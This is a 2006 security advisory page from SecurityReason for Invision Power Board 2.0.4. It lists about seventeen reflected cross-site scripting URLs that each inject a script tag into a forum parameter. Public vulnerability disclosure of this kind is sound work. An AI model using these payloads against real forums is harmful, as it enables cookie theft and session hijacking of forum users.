|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 596 CVE : CVE-2006-3197 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Mr.SNAKE Published : 18.03.2006
Advisory Content : Software: Invision Power Board Web Site:http://www.invisionpower.com tested in v2.0.4 exploit : forum/index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb024288988 9796819a2b367&search_in=ooo&result_type='><script>alert(document.cookie) </script> forum/index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb024288988 9796819a2b367&search_in='><script>alert(document.cookie)</script>&result _type=posts foum/index.php?act=Search&nav='><script>alert(document.cookie)</script> forum/index.php?showtopic=1&st='><script>alert(document.cookie)</script> forum/index.php?s=504b8a357b04e1b276f08a039955177f&act=Search&nav=au&COD E=show&searchid=5f25843edb0242889889796819a2b367&search_in='><script>ale rt(document.cookie)</script> forum/index.php?s=21355e75e21dcc4c04e24c5c7247b220&act=Search&CODE=01&fo rums='><script>alert(document.cookie)</script> forum/index.php?s='><script>alert(document.cookie)</script>&act=Search&C ODE=01&forums=all forum/index.php?act=calendar&code=birthdays&y=[any year]&m='><script>alert(document.cookie)</script>&d=[any day] forum/index.php?act=calendar&code=birthdays&y='><script>alert(document.c ookie)</script>&m=[any month]&d=[any day] forum/index.php?act=calendar&code=birthdays&y=[any year]&m=[any month]&d='><script>alert(document.cookie)</script> forum/index.php?act=Print&client=printer&f=1&t='><script>alert(document. cookie)</script> forum/index.php?act=Mail&CODE=00&MID='><script>alert(document.cookie)</s cript> forum/index.php?act=Help&CODE=01&HID='><script>alert(document.cookie)</s cript> forum/index.php?act=search&CODE=getnew&active='><script>alert(document.c ookie)</script>&lastdate=1 forum/index.php?act=Members&max_results=10&sort_key=posts&sort_order='>< script>alert(document.cookie)</script> forum/index.php?act=Members&max_results='><script>alert(document.cookie) </script>&sort_key=posts&sort_order=desc forum/index.php?act=Members&max_results=10&sort_key='><script>alert(docu ment.cookie)</script>&sort_order=desc&sort_order=desc all 17 XSS are tested in v2.0.4 Discovered by: Mr.SNAKE GreeTz : T0 mY a11 Fr!nD in www.lezr.com special thnx for pppppp _________________________________________________________________ Don't just search. Find. Check out the new MSN Search! http://search.msn.com/  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |